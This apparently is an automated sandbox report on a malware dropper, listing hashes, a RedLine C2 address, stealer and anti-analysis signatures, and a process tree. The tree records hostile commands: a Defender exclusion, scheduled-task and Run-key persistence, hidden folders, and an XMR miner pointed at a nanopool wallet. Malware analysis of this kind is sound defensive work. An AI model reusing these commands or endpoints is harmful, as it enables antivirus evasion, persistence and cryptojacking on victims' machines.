Resubmissions

19-09-2021 09:55

210919-lx4m7abhb4 10

19-09-2021 08:44

210919-kncbxabgh5 10

Analysis

  • max time kernel
    1802s
  • max time network
    1794s
  • platform
    windows11_x64
  • resource
    win11
  • submitted
    19-09-2021 08:44

General

  • Target

    setup_x86_x64_install.exe

  • Size

    4.3MB

  • MD5

    7b4b44cc869a8b0f51ace918cef015ca

  • SHA1

    7b59d8a253c17d658eddbb32fe139c969aee8962

  • SHA256

    f38f738f52674e3f4689cdb299e82d40a6446ccec24abd4cac244fe64cdc07ed

  • SHA512

    78ed354bec23b5c892a7c104630ae1ebf2dfe3fc8f3ee8156af1e3ab5fa572f829856213fe31772ba9496bdfaf8dd507c0c6d8b488a9bf94bc338c4bff5141b0

Malware Config

Extracted

Family

redline

Botnet

ANI

C2

45.142.215.47:27643

Signatures

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Process spawned unexpected child process 3 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 4 IoCs
  • Socelars

    Socelars is an infostealer targeting browser cookies and credit card credentials.

  • Socelars Payload 2 IoCs
  • Suspicious use of NtCreateProcessExOtherParentProcess 24 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • Vidar Stealer 2 IoCs
  • ASPack v2.12-2.42 7 IoCs

    Detects executables packed with ASPack v2.12-2.42

  • Blocklisted process makes network request 44 IoCs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 64 IoCs
  • Sets file to hidden 1 TTPs

    Modifies file attributes to stop it showing in Explorer etc.

  • Checks BIOS information in registry 2 TTPs 29 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Loads dropped DLL 34 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 5 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 14 IoCs
  • Enumerates connected drives 3 TTPs 64 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 6 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 15 IoCs
  • Suspicious use of SetThreadContext 13 IoCs
  • Drops file in Program Files directory 17 IoCs
  • Drops file in Windows directory 28 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 22 IoCs
  • Checks SCSI registry key(s) 3 TTPs 6 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 64 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 7 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 5 IoCs
  • Enumerates system info in registry 2 TTPs 49 IoCs
  • Kills process with taskkill 3 IoCs
  • Modifies data under HKEY_USERS 46 IoCs
  • Modifies registry class 6 IoCs
  • Modifies system certificate store 2 TTPs 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 4 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 2 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe
    "C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3552
    • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
      "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:4996
      • C:\Users\Admin\AppData\Local\Temp\7zS483B82E0\setup_install.exe
        "C:\Users\Admin\AppData\Local\Temp\7zS483B82E0\setup_install.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious use of WriteProcessMemory
        PID:4992
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:4416
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
            5⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:4804
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c Sun06c75858d552.exe
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:832
          • C:\Users\Admin\AppData\Local\Temp\7zS483B82E0\Sun06c75858d552.exe
            Sun06c75858d552.exe
            5⤵
            • Executes dropped EXE
            • Suspicious use of AdjustPrivilegeToken
            PID:1300
            • C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
              "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
              6⤵
              • Executes dropped EXE
              PID:6136
              • C:\Users\Admin\AppData\Local\Temp\setup.exe
                "C:\Users\Admin\AppData\Local\Temp\setup.exe"
                7⤵
                • Executes dropped EXE
                PID:5268
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 5268 -s 608
                  8⤵
                  • Program crash
                  • Checks processor information in registry
                  • Enumerates system info in registry
                  PID:7052
              • C:\Users\Admin\AppData\Local\Temp\2.exe
                "C:\Users\Admin\AppData\Local\Temp\2.exe"
                7⤵
                • Suspicious use of NtCreateProcessExOtherParentProcess
                • Executes dropped EXE
                • Suspicious use of AdjustPrivilegeToken
                PID:6004
                • C:\Windows\system32\WerFault.exe
                  C:\Windows\system32\WerFault.exe -u -p 6004 -s 1732
                  8⤵
                  • Program crash
                  • Checks processor information in registry
                  • Enumerates system info in registry
                  PID:5104
              • C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe
                "C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe"
                7⤵
                • Executes dropped EXE
                • Suspicious use of AdjustPrivilegeToken
                PID:5852
                • C:\ProgramData\5535857.exe
                  "C:\ProgramData\5535857.exe"
                  8⤵
                  • Executes dropped EXE
                  PID:3128
                • C:\ProgramData\7846899.exe
                  "C:\ProgramData\7846899.exe"
                  8⤵
                    PID:6892
                  • C:\ProgramData\2829621.exe
                    "C:\ProgramData\2829621.exe"
                    8⤵
                      PID:6980
                      • C:\ProgramData\2829621.exe
                        "C:\ProgramData\2829621.exe"
                        9⤵
                        • Checks processor information in registry
                        • Enumerates system info in registry
                        PID:1672
                    • C:\ProgramData\4761616.exe
                      "C:\ProgramData\4761616.exe"
                      8⤵
                      • Checks BIOS information in registry
                      • Checks whether UAC is enabled
                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                      PID:6816
                  • C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe
                    "C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"
                    7⤵
                    • Executes dropped EXE
                    PID:5500
                    • C:\Windows\System32\cmd.exe
                      "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
                      8⤵
                        PID:6424
                        • C:\Windows\system32\schtasks.exe
                          schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
                          9⤵
                          • Creates scheduled task(s)
                          PID:6768
                      • C:\Users\Admin\AppData\Roaming\services64.exe
                        "C:\Users\Admin\AppData\Roaming\services64.exe"
                        8⤵
                        • Suspicious use of SetThreadContext
                        PID:7032
                        • C:\Windows\System32\cmd.exe
                          "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
                          9⤵
                            PID:5608
                            • C:\Windows\system32\schtasks.exe
                              schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
                              10⤵
                              • Creates scheduled task(s)
                              PID:1952
                          • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
                            "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
                            9⤵
                              PID:5968
                            • C:\Windows\explorer.exe
                              C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.add/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6O4DG/ZgkwoY7/pmBv4ks3wJ7PR9JPsLklOJLkitFc6Y" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth
                              9⤵
                                PID:5836
                          • C:\Users\Admin\AppData\Local\Temp\askinstall58.exe
                            "C:\Users\Admin\AppData\Local\Temp\askinstall58.exe"
                            7⤵
                            • Executes dropped EXE
                            • Suspicious use of AdjustPrivilegeToken
                            PID:5328
                          • C:\Users\Admin\AppData\Local\Temp\LivelyScreenRecMik18.exe
                            "C:\Users\Admin\AppData\Local\Temp\LivelyScreenRecMik18.exe"
                            7⤵
                            • Executes dropped EXE
                            PID:5464
                            • C:\Users\Admin\AppData\Local\Temp\tmp628D_tmp.exe
                              "C:\Users\Admin\AppData\Local\Temp\tmp628D_tmp.exe"
                              8⤵
                              • Executes dropped EXE
                              • Suspicious use of SetThreadContext
                              PID:6340
                              • C:\Users\Admin\AppData\Local\Temp\tmp628D_tmp.exe
                                C:\Users\Admin\AppData\Local\Temp\tmp628D_tmp.exe
                                9⤵
                                  PID:5196
                            • C:\Users\Admin\AppData\Local\Temp\6.exe
                              "C:\Users\Admin\AppData\Local\Temp\6.exe"
                              7⤵
                              • Executes dropped EXE
                              PID:2568
                              • C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
                                "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
                                8⤵
                                  PID:5836
                                  • C:\Windows\SysWOW64\cmd.exe
                                    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\23890147553\FoxyNew\jk847.bat" "
                                    9⤵
                                      PID:1264
                                      • C:\Windows\System32\Conhost.exe
                                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        10⤵
                                        • Executes dropped EXE
                                        • Suspicious use of SetThreadContext
                                        PID:4792
                                      • C:\Users\Admin\AppData\Roaming\23890147553\FoxyNew\FoxyIDS2.exe
                                        FoxyIDS2.exe
                                        10⤵
                                          PID:2848
                                          • C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp
                                            "C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp" -d "C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\"
                                            11⤵
                                              PID:2188
                                          • C:\Users\Admin\AppData\Roaming\23890147553\FoxyNew\Foxynew.exe
                                            Foxynew.exe
                                            10⤵
                                            • Suspicious use of SetThreadContext
                                            PID:3984
                                            • C:\Users\Admin\AppData\Roaming\23890147553\FoxyNew\Foxynew.exe
                                              Foxynew.exe
                                              11⤵
                                                PID:6948
                                                • C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
                                                  "C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe"
                                                  12⤵
                                                    PID:5856
                                                    • C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
                                                      "C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe"
                                                      13⤵
                                                      • Adds Run key to start application
                                                      PID:5112
                                                      • C:\Windows\SysWOW64\cmd.exe
                                                        "C:\Windows\System32\cmd.exe" /C REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\e0171c4c73\
                                                        14⤵
                                                          PID:6360
                                                          • C:\Windows\SysWOW64\reg.exe
                                                            REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\e0171c4c73\
                                                            15⤵
                                                              PID:2248
                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                            "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN sqtvvs.exe /TR "C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe" /F
                                                            14⤵
                                                            • Creates scheduled task(s)
                                                            PID:3304
                                                          • C:\Users\Admin\AppData\Local\Temp\tool\tool.exe
                                                            "C:\Users\Admin\AppData\Local\Temp\tool\tool.exe"
                                                            14⤵
                                                            • Modifies registry class
                                                            PID:4128
                                                            • C:\Windows\SysWOW64\WScript.exe
                                                              "C:\Windows\System32\WScript.exe" "C:\dPack\tr\t.vbs" /f=CREATE_NO_WINDOW install.cmd
                                                              15⤵
                                                                PID:6348
                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                  C:\Windows\system32\cmd.exe /c ""C:\dPack\tr\ots.bat" "
                                                                  16⤵
                                                                  • Modifies registry class
                                                                  PID:4472
                                                                  • C:\Windows\SysWOW64\timeout.exe
                                                                    timeout 7
                                                                    17⤵
                                                                    • Delays execution with timeout.exe
                                                                    PID:5300
                                                                  • C:\dPack\tr\1obe.com
                                                                    "1obe.com" e -p78acsddgdaskuUKJgdhxsh6 PD441.rar
                                                                    17⤵
                                                                      PID:5764
                                                                    • C:\Windows\SysWOW64\timeout.exe
                                                                      timeout 6
                                                                      17⤵
                                                                      • Executes dropped EXE
                                                                      • Checks BIOS information in registry
                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                      • Delays execution with timeout.exe
                                                                      PID:6092
                                                                    • C:\Windows\SysWOW64\timeout.exe
                                                                      timeout 8
                                                                      17⤵
                                                                      • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                      • Delays execution with timeout.exe
                                                                      PID:4884
                                                                    • C:\Windows\SysWOW64\WScript.exe
                                                                      "C:\Windows\System32\WScript.exe" "C:\dPack\tr\chs.vbs"
                                                                      17⤵
                                                                        PID:5556
                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                          C:\Windows\system32\cmd.exe /c ""C:\dPack\tr\ro3.bat" "
                                                                          18⤵
                                                                            PID:4620
                                                                            • C:\Windows\SysWOW64\attrib.exe
                                                                              attrib +s +h "C:\dPack\tr"
                                                                              19⤵
                                                                              • Suspicious use of SetThreadContext
                                                                              • Views/modifies file attributes
                                                                              PID:5856
                                                                            • C:\Windows\SysWOW64\timeout.exe
                                                                              timeout 2
                                                                              19⤵
                                                                              • Delays execution with timeout.exe
                                                                              PID:5244
                                                                            • C:\dPack\tr\vertoor.exe
                                                                              vertoor.exe /start
                                                                              19⤵
                                                                              • Suspicious use of SetThreadContext
                                                                              PID:3964
                                                                              • C:\dPack\tr\vertoor.exe
                                                                                vertoor.exe /start
                                                                                20⤵
                                                                                  PID:2176
                                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                                taskkill /f /im 1obe.com
                                                                                19⤵
                                                                                • Kills process with taskkill
                                                                                PID:6824
                                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                                taskkill /f /im 1obe.com
                                                                                19⤵
                                                                                • Kills process with taskkill
                                                                                PID:5516
                                                                              • C:\Windows\SysWOW64\attrib.exe
                                                                                attrib -s -h "C:\dPack\tr"
                                                                                19⤵
                                                                                • Views/modifies file attributes
                                                                                PID:5852
                                                                              • C:\Windows\SysWOW64\timeout.exe
                                                                                timeout 4
                                                                                19⤵
                                                                                • Suspicious use of SetThreadContext
                                                                                • Delays execution with timeout.exe
                                                                                PID:6980
                                                      • C:\Users\Admin\AppData\Local\Temp\setup_2.exe
                                                        "C:\Users\Admin\AppData\Local\Temp\setup_2.exe"
                                                        7⤵
                                                        • Executes dropped EXE
                                                        PID:5424
                                                        • C:\Users\Admin\AppData\Local\Temp\is-249QV.tmp\setup_2.tmp
                                                          "C:\Users\Admin\AppData\Local\Temp\is-249QV.tmp\setup_2.tmp" /SL5="$10384,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe"
                                                          8⤵
                                                          • Executes dropped EXE
                                                          • Loads dropped DLL
                                                          PID:4496
                                                          • C:\Users\Admin\AppData\Local\Temp\setup_2.exe
                                                            "C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT
                                                            9⤵
                                                            • Executes dropped EXE
                                                            PID:6496
                                                      • C:\Users\Admin\AppData\Local\Temp\3002.exe
                                                        "C:\Users\Admin\AppData\Local\Temp\3002.exe"
                                                        7⤵
                                                        • Executes dropped EXE
                                                        PID:5540
                                                        • C:\Users\Admin\AppData\Local\Temp\3002.exe
                                                          "C:\Users\Admin\AppData\Local\Temp\3002.exe" -a
                                                          8⤵
                                                            PID:1144
                                                        • C:\Users\Admin\AppData\Local\Temp\jhuuee.exe
                                                          "C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"
                                                          7⤵
                                                          • Executes dropped EXE
                                                          PID:6576
                                                        • C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe
                                                          "C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe"
                                                          7⤵
                                                            PID:6972
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      C:\Windows\system32\cmd.exe /c Sun06d6464ba08aa8a36.exe
                                                      4⤵
                                                      • Suspicious use of WriteProcessMemory
                                                      PID:3800
                                                      • C:\Users\Admin\AppData\Local\Temp\7zS483B82E0\Sun06d6464ba08aa8a36.exe
                                                        Sun06d6464ba08aa8a36.exe
                                                        5⤵
                                                        • Executes dropped EXE
                                                        PID:4164
                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 4164 -s 240
                                                          6⤵
                                                          • Program crash
                                                          • Checks processor information in registry
                                                          • Enumerates system info in registry
                                                          PID:5900
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      C:\Windows\system32\cmd.exe /c Sun060f31ba456a.exe
                                                      4⤵
                                                      • Suspicious use of WriteProcessMemory
                                                      PID:4008
                                                      • C:\Users\Admin\AppData\Local\Temp\7zS483B82E0\Sun060f31ba456a.exe
                                                        Sun060f31ba456a.exe
                                                        5⤵
                                                        • Executes dropped EXE
                                                        • Suspicious use of SetThreadContext
                                                        PID:3700
                                                        • C:\Users\Admin\AppData\Local\Temp\7zS483B82E0\Sun060f31ba456a.exe
                                                          C:\Users\Admin\AppData\Local\Temp\7zS483B82E0\Sun060f31ba456a.exe
                                                          6⤵
                                                          • Executes dropped EXE
                                                          PID:5696
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      C:\Windows\system32\cmd.exe /c Sun0624f62ed3cfc8.exe
                                                      4⤵
                                                        PID:5084
                                                        • C:\Users\Admin\AppData\Local\Temp\7zS483B82E0\Sun0624f62ed3cfc8.exe
                                                          Sun0624f62ed3cfc8.exe
                                                          5⤵
                                                          • Executes dropped EXE
                                                          • Suspicious use of AdjustPrivilegeToken
                                                          PID:4828
                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 4828 -s 1632
                                                            6⤵
                                                            • Program crash
                                                            PID:1672
                                                      • C:\Windows\SysWOW64\cmd.exe
                                                        C:\Windows\system32\cmd.exe /c Sun06a0ec9fc7.exe
                                                        4⤵
                                                        • Suspicious use of WriteProcessMemory
                                                        PID:660
                                                        • C:\Users\Admin\AppData\Local\Temp\7zS483B82E0\Sun06a0ec9fc7.exe
                                                          Sun06a0ec9fc7.exe
                                                          5⤵
                                                          • Executes dropped EXE
                                                          PID:4128
                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 4128 -s 264
                                                            6⤵
                                                            • Program crash
                                                            • Enumerates system info in registry
                                                            PID:6108
                                                      • C:\Windows\SysWOW64\cmd.exe
                                                        C:\Windows\system32\cmd.exe /c Sun06abb9b770e9b36c.exe
                                                        4⤵
                                                          PID:5048
                                                          • C:\Users\Admin\AppData\Local\Temp\7zS483B82E0\Sun06abb9b770e9b36c.exe
                                                            Sun06abb9b770e9b36c.exe
                                                            5⤵
                                                            • Executes dropped EXE
                                                            PID:4820
                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 4820 -s 328
                                                              6⤵
                                                              • Drops file in Windows directory
                                                              • Program crash
                                                              • Enumerates system info in registry
                                                              • Suspicious use of AdjustPrivilegeToken
                                                              PID:5804
                                                        • C:\Windows\SysWOW64\cmd.exe
                                                          C:\Windows\system32\cmd.exe /c Sun061fcef41b576c18.exe /mixone
                                                          4⤵
                                                          • Suspicious use of WriteProcessMemory
                                                          PID:5060
                                                          • C:\Users\Admin\AppData\Local\Temp\7zS483B82E0\Sun061fcef41b576c18.exe
                                                            Sun061fcef41b576c18.exe /mixone
                                                            5⤵
                                                            • Executes dropped EXE
                                                            PID:4824
                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 4824 -s 264
                                                              6⤵
                                                              • Program crash
                                                              • Checks processor information in registry
                                                              • Enumerates system info in registry
                                                              PID:6056
                                                        • C:\Windows\SysWOW64\cmd.exe
                                                          C:\Windows\system32\cmd.exe /c Sun06ee1e0a2c54.exe
                                                          4⤵
                                                            PID:4796
                                                            • C:\Users\Admin\AppData\Local\Temp\7zS483B82E0\Sun06ee1e0a2c54.exe
                                                              Sun06ee1e0a2c54.exe
                                                              5⤵
                                                              • Executes dropped EXE
                                                              PID:5076
                                                          • C:\Windows\SysWOW64\cmd.exe
                                                            C:\Windows\system32\cmd.exe /c Sun061927332abbf6f4e.exe
                                                            4⤵
                                                              PID:648
                                                              • C:\Users\Admin\AppData\Local\Temp\7zS483B82E0\Sun061927332abbf6f4e.exe
                                                                Sun061927332abbf6f4e.exe
                                                                5⤵
                                                                • Executes dropped EXE
                                                                • Suspicious use of AdjustPrivilegeToken
                                                                PID:4624
                                                                • C:\Users\Admin\AppData\Roaming\7383096.scr
                                                                  "C:\Users\Admin\AppData\Roaming\7383096.scr" /S
                                                                  6⤵
                                                                  • Executes dropped EXE
                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                  PID:6084
                                                                • C:\Users\Admin\AppData\Roaming\7392048.scr
                                                                  "C:\Users\Admin\AppData\Roaming\7392048.scr" /S
                                                                  6⤵
                                                                    PID:6092
                                                                  • C:\Users\Admin\AppData\Roaming\4522234.scr
                                                                    "C:\Users\Admin\AppData\Roaming\4522234.scr" /S
                                                                    6⤵
                                                                    • Executes dropped EXE
                                                                    • Suspicious use of SetThreadContext
                                                                    PID:4928
                                                                    • C:\Users\Admin\AppData\Roaming\4522234.scr
                                                                      "C:\Users\Admin\AppData\Roaming\4522234.scr"
                                                                      7⤵
                                                                      • Executes dropped EXE
                                                                      PID:5128
                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 4928 -s 1068
                                                                      7⤵
                                                                      • Program crash
                                                                      • Checks processor information in registry
                                                                      • Enumerates system info in registry
                                                                      PID:1280
                                                                  • C:\Users\Admin\AppData\Roaming\4376891.scr
                                                                    "C:\Users\Admin\AppData\Roaming\4376891.scr" /S
                                                                    6⤵
                                                                    • Executes dropped EXE
                                                                    • Checks BIOS information in registry
                                                                    • Checks whether UAC is enabled
                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                    PID:2264
                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                C:\Windows\system32\cmd.exe /c Sun06d03e50f999fd357.exe
                                                                4⤵
                                                                  PID:1264
                                                                  • C:\Users\Admin\AppData\Local\Temp\7zS483B82E0\Sun06d03e50f999fd357.exe
                                                                    Sun06d03e50f999fd357.exe
                                                                    5⤵
                                                                    • Executes dropped EXE
                                                                    PID:5288
                                                                    • C:\Users\Admin\AppData\Local\Temp\is-HG6N3.tmp\Sun06d03e50f999fd357.tmp
                                                                      "C:\Users\Admin\AppData\Local\Temp\is-HG6N3.tmp\Sun06d03e50f999fd357.tmp" /SL5="$200BA,247014,163328,C:\Users\Admin\AppData\Local\Temp\7zS483B82E0\Sun06d03e50f999fd357.exe"
                                                                      6⤵
                                                                      • Executes dropped EXE
                                                                      • Loads dropped DLL
                                                                      PID:5508
                                                                      • C:\Users\Admin\AppData\Local\Temp\is-D5I6B.tmp\Ze2ro.exe
                                                                        "C:\Users\Admin\AppData\Local\Temp\is-D5I6B.tmp\Ze2ro.exe" /S /UID=burnerch2
                                                                        7⤵
                                                                        • Drops file in Drivers directory
                                                                        • Executes dropped EXE
                                                                        • Adds Run key to start application
                                                                        • Drops file in Program Files directory
                                                                        PID:5828
                                                                        • C:\Program Files\Windows Mail\HSRPGSOOCE\ultramediaburner.exe
                                                                          "C:\Program Files\Windows Mail\HSRPGSOOCE\ultramediaburner.exe" /VERYSILENT
                                                                          8⤵
                                                                            PID:6300
                                                                            • C:\Users\Admin\AppData\Local\Temp\is-FQNE1.tmp\ultramediaburner.tmp
                                                                              "C:\Users\Admin\AppData\Local\Temp\is-FQNE1.tmp\ultramediaburner.tmp" /SL5="$303FC,281924,62464,C:\Program Files\Windows Mail\HSRPGSOOCE\ultramediaburner.exe" /VERYSILENT
                                                                              9⤵
                                                                              • Drops file in Program Files directory
                                                                              • Suspicious use of FindShellTrayWindow
                                                                              PID:580
                                                                              • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                                "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
                                                                                10⤵
                                                                                  PID:3316
                                                                            • C:\Users\Admin\AppData\Local\Temp\9a-eb392-34f-1ee97-33027e558c539\SHelamogicy.exe
                                                                              "C:\Users\Admin\AppData\Local\Temp\9a-eb392-34f-1ee97-33027e558c539\SHelamogicy.exe"
                                                                              8⤵
                                                                                PID:2876
                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e6
                                                                                  9⤵
                                                                                  • Adds Run key to start application
                                                                                  • Enumerates system info in registry
                                                                                  • Suspicious use of FindShellTrayWindow
                                                                                  PID:5824
                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x118,0x11c,0x120,0xec,0x124,0x7ff8de7746f8,0x7ff8de774708,0x7ff8de774718
                                                                                    10⤵
                                                                                      PID:6488
                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2216,14274176451516960408,3924739517978131222,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2288 /prefetch:3
                                                                                      10⤵
                                                                                        PID:5720
                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2216,14274176451516960408,3924739517978131222,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2620 /prefetch:8
                                                                                        10⤵
                                                                                          PID:6896
                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
